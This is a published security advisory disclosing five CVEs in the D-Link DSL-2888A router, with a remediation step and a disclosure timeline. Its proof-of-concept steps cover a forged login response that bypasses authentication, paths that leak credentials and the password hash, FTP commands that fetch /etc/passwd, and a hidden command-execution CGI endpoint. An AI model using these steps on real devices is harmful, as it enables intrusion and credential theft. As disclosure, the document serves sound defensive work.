Trustwave SpiderLabs Security Advisory TWSL2020-011: Multiple Vulnerabilities in D-Link DSL-2888A Published: 12/17/2020 Version: 1.0 Vendor: D-Link ( Product: Dual Band Wireless AC1600 Gigabit ADSL2+/VDSL2 Modem Router Version affected: firmware prior to AU_2.31_V1.1.47ae55 Product description from the D-Link Australia website: The PYTHON - Dual Band Wireless AC1600 Gigabit ADSL2+ / VDSL2 Modem Router (DSL-2888A) has all of your online requirements covered with the ADSL/VDSL modem providing compatibilty with all ADSL, VDSL, NBN and UFB connections. With Dual Band AC1600 Wi-Fi providing high speed coverage and a full Gigabit Ethernet interface, this modem will connect desktop computers, smartphones, gaming consoles, smart TVs and more throughout your home. *********************************************************** Finding 1: Insufficient Authentication Credit: Harold Zang of Trustwave CVE: CVE-2020-24580 CWE: CWE-287 Trustwave was able to bypass authentication to access index.html. PoC : ============================================ 1. Navigate to the default login page while using a web interception proxy such as Burp Suite. 2. Submit the login form with an invalid password. 3. Intercept the response package, replace it with the following payload: HTTP/1.1 302 Found Location: /page/login/login_succ.html Connection: close HTTP/1.1 200 OK Connection: close ETag: "edd-115-54c5ed7b" Last-Modified: Mon, 26 Jan 2015 07:32:11 GMT Date: Thu, 01 Jan 1970 00:24:56 GMT Content-Type: text/html Content-Length: 277 Transfer-Encoding: chunked 115 0 4. Observe successful access of index.html. *********************************************************** Finding 2: Information Leakage Credit: Harold Zang of Trustwave CVE: CVE-2020-24577 CWE: CWE-200 The DSL-2888A One Touch application discloses sensitive informatiom such as the admin user's hash and Internet provider connection username and plaintext password in the application's response body. A malicious network user maybe able to use the credential to login to the provider main website. PoC: ============================================ 1. Navigate to the following pages as an authenticated user http://DeviceIP/tmp/home/wan_stat http://DeviceIP/tmp/var/passwd 2. Observe the "wan_stat" file disclosing the Internet provider connection username and plaintext password; and the "passwd" file disclosing the admin user's hash. *********************************************************** Finding 3: FTP Misconfiguration Credit: Harold Zang of Trustwave CVE: CVE-2020-24578 CWE: CWE-16 The DSL-2888A has a misconfigured FTP service that allows a malicious network user access to system folders and download sensitive files such as the password hash file. PoC: ============================================ 1. Use the following command to connect to the FTP service with valid credentials, with a FTP client. ftp DeviceIP 2. Use following command to navigate to the root folder. ftp>cd / 3. Observe directory successfully changed. 4. Use the following command to download the password hash file. ftp>cd etc/ ftp>get passwd 5. Observe successful downloading of the file containing the admin user's hash. *********************************************************** Finding 4: Hidden Functionality Credit: Harold Zang of Trustwave CVE: CVE-2020-24581 CWE: CWE-912 The DSL-2888A contains a functionality that is not available via the router's web application user interface. This function allows an authenticated user to execute Operating System commands. PoC: ============================================ 1. Navigate to following URL with a valid session. http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=ls 2. Observe successful execution the command and list the current folder. *********************************************************** Finding 5: Improper Authentication Credit: Harold Zang of Trustwave CVE: CVE-2020-24579 CWE: CWE-287 Trustwave was able to access the authenticated page without providing valid credential. PoC: ============================================ 1. Login to the web interface with valid credentials from the source IP address with the HTTP header User-Agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36". 2. Close the browser without clicking the Logout button and shutdown the computer. 3. Using a different machine with the same allocated IP address and User-Agent "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36", browse to any page that requires authentication e.g. WiFi.shtml. 4. Observe successful access to the authenticated page without the requirement for valid credential. Remediation Steps: Upgrade to firmware version AU_2.31_V1.1.47ae55 or the latest stable version. Revision History: 05/26/2020 - Vulnerability disclosed to vendor 08/26/2020 - Tested patch and only FTP Misconfiguration was fixed 10/05/2020 - Retested patch 10/30/2020 - Patch released by vendor 12/17/2020 - Advisory published References 1. About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.